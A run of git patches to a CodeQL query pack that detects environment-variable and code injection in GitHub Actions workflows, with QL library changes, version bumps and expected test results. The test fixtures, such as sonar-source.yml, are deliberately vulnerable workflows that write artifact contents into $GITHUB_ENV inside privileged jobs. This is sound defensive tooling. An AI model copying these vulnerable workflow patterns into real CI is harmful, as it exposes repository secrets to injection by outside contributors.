.github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | From 56d2d8ec1000c5666258f1031237170cc1141fb6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:54:30 +0200 Subject: [PATCH 151/707] Update test results --- ql/test/library-tests/test.expected | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8b5f3e7184ba..6fe9408a7a35 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,9 +329,7 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | From 45a51a9f7417c64083fa6511cc81acaedab08b3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:55:24 +0200 Subject: [PATCH 152/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f689f38ef527..2b3896d0cf08 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.6 +version: 0.0.7 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f2ce850e5b83..ac6083b7d6d7 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.6 +version: 0.0.7 groups: - actions - queries From 31a1ea9593a7efaae02ecde49c1fa62b0b8e5f22 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:00 +0200 Subject: [PATCH 153/707] Improve envvar injection --- ql/lib/codeql/actions/Ast.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 21 ++++++ .../actions/security/EnvVarInjectionQuery.qll | 37 ++++++--- ql/src/Security/CWE-077/EnvVarInjection.ql | 2 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 2 +- ql/test/library-tests/test.expected | 6 ++ .../.github/workflows/sonar-source.yml | 75 +++++++++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 11 +++ .../PrivilegedEnvVarInjection.expected | 17 ++++- .../.github/workflows/sonar-source.yml | 71 ++++++++++++++++++ 10 files changed, 229 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a9fe35259c5c..e0da57adb6f2 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,7 +34,7 @@ module Utils { .regexpReplaceAll("^'", "") .regexpReplaceAll("'$", "") or assignment = - line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + var.toUpperCase() + "(\"|')?", 2) ) and key = assignment.splitAt("=", 0).trim() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 242cbcf9a31a..e66c8e7c1b95 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -64,3 +64,24 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } + +/** + * A downloaded artifact that gets assigned to an env var declaration. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-env name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and - expr = exprNode.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) +class EnvVarInjectionFromExprSink extends DataFlow::Node { + EnvVarInjectionFromExprSink() { + exists(Expression expr, Run run, string script, string line, string key, string value | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) and + expr = this.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) + } +} + +class EnvVarInjectionFromFileSink extends DataFlow::Node { + EnvVarInjectionFromFileSink() { + exists(Run run, ArtifactDownloadStep step, string value | + this.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this, _, _) or + this instanceof EnvVarInjectionFromExprSink or + this instanceof EnvVarInjectionFromFileSink or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index e758932b208a..2fca3b324941 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -29,4 +29,4 @@ where ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 811a6f65c7c0..1a32183bfb22 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -25,4 +25,4 @@ where ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6fe9408a7a35..639fbd4c530f 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | @@ -426,6 +428,8 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv +| "sha1 | $( { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - uses: actions/github-script@v6 + with: + script: | + print("${{enb.SONAR_PR_NUM}}") + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index d5dbcbde0869..0c4574a77cbb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -1,5 +1,16 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 2692d03eefec..6dbe7bf3c936 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -1,6 +1,21 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml new file mode 100644 index 000000000000..7dc735dd6bcc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml @@ -0,0 +1,71 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost From ae5b8bc0acfd64438232cdbe4bfc4b524d2849c7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:45 +0200 Subject: [PATCH 154/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf08..f775d7511647 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.7 +version: 0.0.8 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ac6083b7d6d7..2db4c237da3f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.7 +version: 0.0.8 groups: - actions - queries From 58b21d46849af2035327b1257554114e5eaeb972 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:52:13 +0200 Subject: [PATCH 155/707] Improve assignments to GITHUB ENVARS detection --- ql/lib/codeql/actions/Ast.qll | 45 +++++++------------ ql/test/library-tests/test.expected | 7 ++- ql/test/library-tests/test.ql | 3 ++ .../CWE-094/.github/workflows/test.yml | 16 ++++++- .../Security/CWE-094/CodeInjection.expected | 26 ++++++++--- .../CWE-094/PrivilegedCodeInjection.expected | 28 ++++++++---- 6 files changed, 74 insertions(+), 51 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e0da57adb6f2..bbf5c86fb957 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -19,40 +19,25 @@ module Utils { ] } + bindingset[str] + string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") + } + bindingset[line, var] predicate extractAssignment(string line, string var, string key, string value) { exists(string assignment | - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^'", "") - .regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - ) and - key = assignment.splitAt("=", 0).trim() and - value = assignment.splitAt("=", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) or - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + - "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", - 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", - 2) - ) and - key = assignment.splitAt("::", 0).trim() and - value = assignment.splitAt("::", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value = trimQuotes(assignment.splitAt("::", 1)) ) } diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 639fbd4c530f..aa2ccdcfe9c0 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -428,8 +428,6 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv -| "sha1 | $(> $GITHUB_OUTPUT", "echo 'sha2=$(> $GITHUB_OUTPUT", "echo sha3=$(> $GITHUB_OUTPUT", + "echo sha4=$(> \"$GITHUB_OUTPUT\"", + "echo sha5=$(> ${GITHUB_OUTPUT}", + "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and Utils::extractAssignment(t, "OUTPUT", key, value) ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index b9fa152e49ab..153ebc5b733e 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -5,7 +5,7 @@ jobs: runs-on: ubuntu-latest outputs: - job_output: ${{ steps.step2.outputs.test }} + job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 @@ -24,7 +24,19 @@ jobs: - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} - run: echo "test=$MSG" >> "$GITHUB_OUTPUT" + run: echo "MSG2=$MSG" >> "$GITHUB_OUTPUT" + - id: step3 + env: + MSG2: ${{steps.step2.outputs.MSG2}} + run: echo "MSG3=$MSG2" >> "${GITHUB_OUTPUT}" + - id: step4 + env: + MSG3: ${{steps.step3.outputs.MSG3}} + run: echo "MSG4=$MSG3" >> ${GITHUB_OUTPUT} + - id: step5 + env: + MSG4: ${{steps.step4.outputs.MSG4}} + run: echo "MSG5=$MSG4" >> $GITHUB_OUTPUT job2: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index d2e188ead67f..1a12b8e72771 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | @@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | 